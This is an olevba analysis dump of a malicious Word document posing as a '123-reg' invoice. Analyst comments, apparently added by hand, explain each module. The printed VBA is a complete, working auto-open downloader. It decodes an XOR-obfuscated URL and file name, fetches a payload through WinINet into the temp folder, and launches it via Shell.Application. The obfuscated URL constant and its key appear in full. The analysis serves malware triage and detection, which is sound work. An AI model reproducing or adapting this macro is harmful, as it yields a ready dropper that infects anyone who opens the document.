- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 123-reg-invoice.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 123-reg-invoice.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' ALVERTA: pass-through hop in the auto-run chain. The Integer argument is never
- ' read; the only effect is the call to ALYCE (defined in Module1 of this dump).
- Sub ALVERTA(ALVINA As Integer)
- ALYCE
- End Sub
- ' autoopen: entry point. Word runs a sub with this name when the document is
- ' opened (olevba reports it as AutoExec/AutoOpen in the table below), so the
- ' whole chain starts without further user action once macros are enabled.
- ' The literal 703 is filler: ALVERTA ignores its argument.
- Sub autoopen()
- ALVERTA (703)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MOHAMMAD.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' WinINet imports for hosts that are NOT 64-bit VBA7: the #If branch is empty and
- ' the #Else branch carries the declarations. The VBA-side names are meaningless;
- ' the real API names appear only in the Alias clauses (InternetCloseHandle,
- ' InternetOpenA), which is why the olevba table flags "Lib" and wininet.dll.
- ' The 64-bit PtrSafe equivalents are declared in the MARIANO and MONROE modules.
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As Long) As Long
- Public Declare Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As Long
- #End If
- ' ALANNA: download-to-disk routine.
- '   ALISHA  - never read in the body (filler argument).
- '   ALISHIA - path of the file the downloaded bytes are written to.
- ' Returns True when the accumulated data has non-zero length, otherwise the
- ' default False. Flow: open a WinINet session (ANASTACIA), open the URL (AMELIA),
- ' read it in ALESSANDRA-sized chunks via the InternetReadFile alias, write the
- ' result to ALISHIA, then close both handles.
- Public Function ALANNA(ALISHA As Long, ByVal ALISHIA As String) As Boolean
- ' ALYCIA receives the byte count reported by each InternetReadFile call.
- Dim ALYCIA As Long
- ' Fixed-length read buffer (ALESSANDRA = 4000 chars, see MONROE) plus the accumulator.
- Dim Allo5LFRoolE64DIA As String * ALESSANDRA, ALd2PH3OdN3SO As String
- Dim ALISSA As Integer, ALISON As Double
- ' Handle variables are pointer-sized on 64-bit VBA7, Long elsewhere.
- #If VBA7 _
- And Win64 Then
- Dim ALYSE As LongPtr
- Dim ALYSHA As LongPtr
- #Else
- Dim ALYSHA As Long
- Dim ALYSE As Long
- #End If
- ' Session handle from InternetOpenA; bail out silently if it could not be created.
- ALYSE = ANASTACIA
- If ALYSE = 0 Then
- Exit Function
- End If
- Dim ALYSA As Boolean
- ' Empty If body: AMELIA is called only for its side effect of storing the
- ' InternetOpenUrlA handle in ALYSHA (passed ByRef).
- If AMELIA(ALYSHA, ALYSE) Then
- End If
- If ALYSHA = 0 Then
- ' URL could not be opened: leave the length at 0 so the function returns False.
- ALISON = 0
- Else
- ' First read. Note the assignment copies the whole fixed-length buffer, not
- ' just the ALYCIA bytes that were actually read.
- AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
- ALd2PH3OdN3SO = Allo5LFRoolE64DIA
- ' ALITA arithmetic is filler: 22 -> 66, and 66 > 110 is never true, so the
- ' "End" here (and the "ALITA < 0" one further down) can never execute.
- Dim ALITA As Long
- ALITA = 22
- ALITA = 4 * ALITA - 22
- If ALITA > ALITA + 44 Then End
- ' Keep reading until InternetReadFile reports 0 bytes, appending only the
- ' bytes returned by each call.
- Do While ALYCIA <> 0
- AL3ES2H1A2 ALYSHA, Allo5LFRoolE64DIA, ALESSANDRA, ALYCIA
- ALd2PH3OdN3SO = ALd2PH3OdN3SO + Mid(Allo5LFRoolE64DIA, 1, ALYCIA)
- Loop
- ' Two statements joined by ":" and a line continuation: ALISON = length of the
- ' data (ALECIA wraps Len), ALISSA = a free file number (ADELINA wraps FreeFile
- ' and ignores the "JOSEF" argument).
- ALISON = ALECIA(ALd2PH3OdN3SO): _
- ALISSA = ADELINA("JOSEF")
- ' Write the accumulated data to the target path in binary mode. This is the
- ' file-drop step behind the Open/Binary/Write/Put hits in the table below.
- Open ALISHIA _
- For Binary _
- Lock Write As #ALISSA
- Put #ALISSA, , ALd2PH3OdN3SO
- ALITA = ALITA + 87
- If ALITA < 0 Then End
- Close #ALISSA
- End If
- ' Release the URL handle and the session handle (InternetCloseHandle alias).
- Ae3eLAYw3N4A ALYSHA
- Ae3eLAYw3N4A ALYSE
- ALd2PH3OdN3SO = ""
- If ALISON Then
- ALANNA = True
- End If
- End Function
- ' ALENA: returns AMBERLY.GetSpecialFolder(2). The only caller in this dump (AISHA)
- ' passes the object built by ANABEL; for a Scripting.FileSystemObject the value 2
- ' selects the temporary folder, so this is presumably where the download lands.
- Public Function ALENA(ByRef AMBERLY As Object) As Object
- Set ALENA = AMBERLY.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | IOC | wininet.dll | Executable file name |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MILLARD.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MILLARD'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Obfuscated string table. Each hex constant is decoded at run time by ALMEDA:
- ' every hex pair is XORed with one character of the key ADALINE (key index is
- ' (i Mod Len(key)) + 1, so decoding starts at the key's second character).
- '   AARON    - ProgID used by ALBERT; decodes to "Shell.Application".
- '   ABBEY    - file name appended to the special-folder path in AISHA.
- '   ABBIE    - URL handed to InternetOpenUrlA in AMELIA.
- '   ABIALITA - ProgID used by ANABEL; decodes to "Scripting.FileSystemObject".
- ' For triage, decode ABBEY and ABBIE offline with the same XOR routine rather
- ' than by running the document; the results are the host and network indicators.
- Public Const AARON = "193B33233B78033F272E2634283C2B2721"
- Public Const ABBEY = "163A3E22363F2E7B79736167672D3A2D"
- Public Const ABBIE = "2227223F6D796D2938313B323B212C2F222C5A5D46222F20782C383B6D7B647060607E6627302A"
- Public Const ABIALITA = "1930242627222B21306C093E252D11313C3D525F7B292036353B"
- ' XOR key for the table above (22 characters).
- Public Const ADALINE = "KJSVOWVBOWBOWIHBHOI724"
- ' 64-bit (PtrSafe) declaration of the InternetReadFile alias; the 32-bit one is in Module1.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As LongPtr, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
- #End If
- ' AGUEDA: hop that reaches the real work. Apart from creating the object returned
- ' by ANABEL and calling AISHA, everything here is filler (counter loops that
- ' modify their own index, an "End" guarded by a condition that cannot be true,
- ' and arithmetic on the unused argument). No return value is assigned.
- Public Function AGUEDA(AMANDA As Double)
- ' Local Object named AFTON; it shadows the AFTON function from MONROE in this scope.
- Dim AFTON As Object
- Dim AIDA As Long
- ' Filler loop: body runs once because it pushes AIDA past the upper bound.
- For AIDA = 43 To 47
- AIDA = AIDA + 22
- Next AIDA
- Dim WESTON As Object
- ' Filler loop, same pattern.
- For AIDA = 21 To 76
- AIDA = AIDA + 73
- Next AIDA
- ' WESTON = object created from the decoded ABIALITA ProgID (see ANABEL).
- Set WESTON = ANABEL
- AIDA = AIDA + 345
- Dim LEWIS As Boolean
- ' AIDA is positive here, so AIDA > AIDA * 4 is false and End never runs.
- If AIDA > AIDA * 4 Then End
- ' AISHA performs the download and launch; its result is stored but not used.
- LEWIS = AISHA(AFTON, WESTON)
- AMANDA = AMANDA + 33
- End Function
- ' ALECIA: thin wrapper around Len, used so the decoder and the download routine
- ' never call Len directly.
- Public Function ALECIA(ADELLA As String) As Long
- ALECIA = Len(ADELLA)
- End Function
- ' ALBERT: launch step. Creates the COM object whose ProgID is the decoded AARON
- ' constant ("Shell.Application") and calls its Open method on AKIKO & ALPHONSE,
- ' i.e. the folder object concatenated with the decoded file name.
- ' ALLEGRA is never read and ALBERT is never assigned, so the result is always False.
- ' ALLENA is not declared anywhere in the visible code, so the module presumably
- ' runs without Option Explicit.
- Public Function ALBERT(ByRef AKIKO As Object, ByRef ALPHONSE As String, ALLEGRA As Double) As Boolean
- Set ALLENA = CreateObject(ALMEDA _
- (ADALINE, AARON))
- Dim DUSTY As Integer
- ' AKIKO is an Object; the & concatenation relies on its default property
- ' (presumably the folder's path - confirm against the FileSystemObject docs).
- DUSTY = ALLENA.Open(AKIKO & ALPHONSE)
- End Function
- ' ALMEDA: string decoder (repeating-key XOR over hex text).
- '   ALMETA - key string.
- '   ALONA  - hex-encoded ciphertext, two characters per output character.
- ' Returns the decoded string. Every call in this dump passes ADALINE as the key.
- Public Function ALMEDA(ALMETA As String, ALONA As String) As String
- Dim ALPHA As Integer
- Dim ALTAGRACIA As Integer
- ' Filler: 308 > 3080 is never true, so End cannot run.
- Dim ALTHEA As Long
- ALTHEA = 308
- If ALTHEA > ALTHEA * 10 Then End
- Dim ALEJANDRA As Long
- Dim ALVERA As String
- ' One iteration per hex pair (ALECIA is Len).
- For ALEJANDRA = 1 To (ALECIA(ALONA) / 2)
- ' ALPHA = numeric value of the ALEJANDRA-th hex pair.
- ALPHA = ALEIDA(ALONA, ALEJANDRA)
- ' ALTAGRACIA = character code of the key character for this position.
- ALTAGRACIA = ADRIAN(ALMETA, ALEJANDRA)
- ' Append Chr$(ALPHA Xor ALTAGRACIA).
- ALVERA = ALVERA + ALBERTHA(ALPHA, ALTAGRACIA)
- Next ALEJANDRA
- ALMEDA = ALVERA
- End Function
- ' ADRIAN: returns the character code of the key character used at position
- ' ALEJANDRA, taken at index (ALEJANDRA Mod Len(key)) + 1. The literal 48 is the
- ' ignored first argument of ALEXA (a Mid$ wrapper).
- Public Function ADRIAN(ByRef ALMETA As String, ByRef ALEJANDRA As Long) As Integer
- ADRIAN = Asc(ALEXA(48, ALMETA, ((ALEJANDRA Mod ALECIA(ALMETA)) + 1), 1))
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MARIANO.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARIANO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' 64-bit (PtrSafe) declaration of the InternetCloseHandle alias; the 32-bit
- ' declaration of the same alias lives in the MOHAMMAD module.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function Ae3eLAYw3N4A Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ALE2JANeDR2NA As LongPtr) As Long
- #End If
- ' AILEEN: hop in the call chain. The string work on AILENE is filler and the
- ' argument is never read; the only meaningful statement is the call to AGUEDA.
- Public Function AILEEN(ANAMARIA As String)
- Dim AILENE As String
- AILENE = "ANAMARIA"
- ' Argument value is irrelevant: AGUEDA only adds 33 to it and discards the result.
- AGUEDA 221 + 3.22
- AILENE = AILENE + "AIMEE"
- End Function
- ' ALEIDA: returns the numeric value of the ALEJANDRA-th hex pair of ALONA.
- ' ALYSSA maps the pair index to its start position (2*i - 1), ALEXA extracts two
- ' characters, and ANIBAL applies Val to the "&H"-prefixed text. 78 is filler.
- Public Function ALEIDA(ByRef ALONA As String, ByRef ALEJANDRA As Long) As Double
- ALEIDA = ANIBAL("&H" & (ALEXA(78, ALONA, ALYSSA(ALEJANDRA), 2)))
- End Function
- ' ALEXA: Mid$ wrapper. Returns ALTAGRACIA characters of ADELLA starting at
- ' position ALPHA. ALEXANDRA is filler: it is incremented after the result is set
- ' and has no influence on the returned value.
- Public Function ALEXA(ALEXANDRA As Long, ByRef ADELLA As String, ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
- ALEXA = Mid$(ADELLA, ALPHA, ALTAGRACIA)
- ALEXANDRA = ALEXANDRA + 23
- End Function
- ' ALYSSA: maps a 1-based hex-pair index to the 1-based position of the pair's
- ' first character (1 -> 1, 2 -> 3, 3 -> 5, ...).
- Public Function ALYSSA(ByRef ALEJANDRA As Long) As Long
- ALYSSA = (2 * ALEJANDRA) - 1
- End Function
- ' AGUSTINA: hop in the call chain. The Double argument is never read; the string
- ' literal "ANALISA" passed on is likewise ignored by AILEEN.
- Sub AGUSTINA(ANALISA As Double)
- AILEEN ("ANALISA")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MARY.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MARY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' ANIBAL: Val wrapper. The For loop is filler (its result is overwritten); the
- ' function returns Val(FRANCES), which ALEIDA uses to turn "&Hxx" into a number.
- Public Function ANIBAL(FRANCES As String) As Double
- Dim DILLON As Double
- For DILLON = 26 To 29
- DILLON = DILLON * 6.127
- Next DILLON
- DILLON = Val(FRANCES)
- ANIBAL = DILLON
- End Function
- ' AISHA: orchestrates the download-and-launch sequence.
- '   1. AKIKO    = special folder 2 of the object created by ANABEL (see ALENA).
- '   2. ALPHONSE = file name decoded from ABBEY.
- '   3. ALANNA downloads the payload to AKIKO & ALPHONSE.
- '   4. ALBERT opens that same path through the decoded AARON COM object.
- ' AKILAH is never read. The result is whatever ALBERT returns (always False,
- ' since ALBERT never assigns its return value).
- ' Defender view: an Office process writing a file into the temp folder and then
- ' opening it is the host-side behaviour to look for.
- Public Function AISHA(ByRef AKIKO As Object, ByRef AKILAH As Object) As Boolean
- Dim AL2AIN2A As Integer
- Set AKIKO = ALENA(ANABEL)
- Dim ADOLFO
- Dim ALPHONSE As String
- ' 3001 is filler: AFTON multiplies it and then just calls ALMEDA(ADALINE, ABBEY).
- ALPHONSE = AFTON(3001, ADALINE, ABBEY)
- ' Filler loop.
- For AL2AIN2A = 21 To 34
- AL2AIN2A = AL2AIN2A * 12
- Next AL2AIN2A
- ' Full target path: folder object (via its default property) & decoded file name.
- ADOLFO = AKIKO & ALPHONSE
- ' Empty If body: ALANNA is called for its side effect (download and write);
- ' the launch below happens whether or not the download succeeded.
- If ALANNA(52, ADOLFO) Then
- End If
- AISHA = ALBERT(AKIKO, ALPHONSE, 966)
- End Function
- ' ALBERTHA: core of the string decoder. Returns the single character whose code
- ' is ALPHA Xor ALTAGRACIA (the Chr/Xor pair flagged in the olevba table below).
- Public Function ALBERTHA(ByRef ALPHA As Integer, ByRef ALTAGRACIA As Integer) As String
- Dim ALISA As Long
- ALISA = ALPHA Xor ALTAGRACIA
- ALBERTHA = Chr$(ALISA)
- End Function
- ' ANASTACIA: opens the WinINet session via the InternetOpenA alias and returns
- ' the handle (LongPtr on 64-bit VBA7, Long otherwise).
- ' Arguments: ANDERA ("ALETHEA") is the agent string, ANDRE (1) is the access
- ' type, which matches INTERNET_OPEN_TYPE_DIRECT; no proxy name or bypass list.
- ' The fixed agent string "ALETHEA" is a usable network indicator for this sample.
- #If VBA7 _
- And Win64 Then
- Public Function ANASTACIA() As LongPtr
- #Else
- Public Function ANASTACIA() As Long
- #End If
- ANASTACIA = AN3DR1EE2 _
- (ANDERA, _
- ANDRE, vbNullString, vbNullString, 0)
- End Function
- ' ANABEL: decodes the ABIALITA constant with key ADALINE and creates the COM
- ' object named by the result ("Scripting.FileSystemObject"). Building the ProgID
- ' at run time keeps the literal out of the macro source, so a static keyword
- ' scan sees only the generic CreateObject call.
- Public Function ANABEL() As Object
- Dim AMPARO As String
- AMPARO = ALMEDA(ADALINE, ABIALITA)
- Set ANABEL = CreateObject(AMPARO)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MONROE.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/MONROE'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' 64-bit (PtrSafe) declaration of the InternetOpenA alias; the 32-bit one is in
- ' the MOHAMMAD module.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function AN3DR1EE2 Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALd2PH3OdN3SO As String, ByVal ALE13Xeq1AN13DR13IA As Long, ByVal ALeeqqEqXIdA As String, ByVal ALEg322f223XIS As String, ByVal A32gLF44wvEDA As Long) As LongPtr
- #End If
- ' JASPER is not referenced anywhere in the visible modules.
- Public Const JASPER = "RUSSEL"
- ' Read-buffer size, in characters, used by ALANNA.
- Public Const ALESSANDRA = 4000
- ' Agent string passed to InternetOpenA by ANASTACIA.
- Public Const ANDERA As String = "ALETHEA"
- ' Access type passed to InternetOpenA (1 matches INTERNET_OPEN_TYPE_DIRECT).
- Public Const ANDRE = 1
- ' Flags passed to InternetOpenUrlA by AMELIA; &H4000000 matches WinINet's
- ' no-cache-write flag, so the response would not be stored in the cache.
- Public Const ALETHIA = &H4000000
- ' AMELIA: opens the remote URL.
- '   AMIEE - ByRef output: receives the handle returned by the InternetOpenUrlA alias.
- '   AMINA - session handle from ANASTACIA.
- ' Always returns True, even if the open failed; the caller (ALANNA) checks the
- ' handle for 0 instead of the return value.
- #If VBA7 And Win64 Then
- Public Function AMELIA(ByRef AMIEE As LongPtr, AMINA As LongPtr) As Boolean
- #Else
- Public Function AMELIA(ByRef AMIEE As Long, AMINA As Long) As Boolean
- #End If
- Dim AM425Ewr24tRI52CA As Long
- Dim AMIRA As String
- Dim AMMIE As Long
- ' AMIRA = URL decoded from ABBIE with key ADALINE (301 is a filler argument).
- AMIRA = AFTON(301, ADALINE, ABBIE)
- ' Filler: start (55) is above the end (33) with the default step, so the body never runs.
- For AM425Ewr24tRI52CA = 55 To 33
- AM425Ewr24tRI52CA = AM425Ewr24tRI52CA + 900
- Next AM425Ewr24tRI52CA
- ' No extra headers (vbNullString, 0); ALETHIA supplies the flags.
- AMIEE = AL3ES1HI5A(AMINA, AMIRA, vbNullString, 0, ALETHIA, 0)
- AMELIA = True
- End Function
- ' AFTON: indirection around the decoder. AGATHA is multiplied and then discarded;
- ' the result is simply ALMEDA(HILARIO, ENRIQUE), i.e. ENRIQUE decoded with key HILARIO.
- Public Function AFTON(AGATHA As Long, HILARIO As String, ENRIQUE As String) As String
- AGATHA = AGATHA * 3
- AFTON = ALMEDA(HILARIO, ENRIQUE)
- End Function
- ' ADELINA: FreeFile wrapper. The string argument is never read; the result is
- ' the file number ALANNA uses for its Open/Put/Close sequence.
- Public Function ADELINA(ADELLA As String) As Integer
- ADELINA = FreeFile
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | IOC | wininet.dll | Executable file name |
- +------------+-------------+-------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: 123-reg-invoice.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Remaining WinINet imports. First block: 64-bit (PtrSafe) InternetOpenUrlA alias.
- ' Second block: 32-bit InternetReadFile and InternetOpenUrlA aliases, declared in
- ' the #Else branch of an otherwise empty #If. Together with the other modules the
- ' sample imports InternetOpenA, InternetOpenUrlA, InternetReadFile and
- ' InternetCloseHandle, the API set needed to fetch a URL, for both bitnesses.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As LongPtr, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As LongPtr
- #End If
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function AL3ES2H1A2 Lib "wininet.dll" Alias "InternetReadFile" (ByVal Aeu555LuESeIA As Long, ByVal Allo5LFRoolE64DIA As String, ByVal AwefLIC24t24vrA As Long, A4Lgerg3CI11A As Long) As Integer
- Public Declare Function AL3ES1HI5A Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MwHAweggqMMegwb3ED As Long, ByVal Seq22A44N6Y As String, ByVal Ae5eLI357357DA As String, ByVal B9RI899990A0N As Long, ByVal H42OU1ST3ON As Long, ByVal LIN3y3CO425uLN As Long) As Long
- #End If
- ' ALYCE: hop in the call chain (autoopen -> ALVERTA -> ALYCE -> AGUSTINA -> ...).
- ' DEWITT is unused and the loop is filler; the only meaningful statement is the
- ' call to AGUSTINA, whose argument is ignored.
- Public Sub ALYCE()
- Dim DEWITT As Double
- Dim AGRIPINA As Double
- For AGRIPINA = 21 To 25
- AGRIPINA = AGRIPINA + 22
- Next AGRIPINA
- AGUSTINA (6.33)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+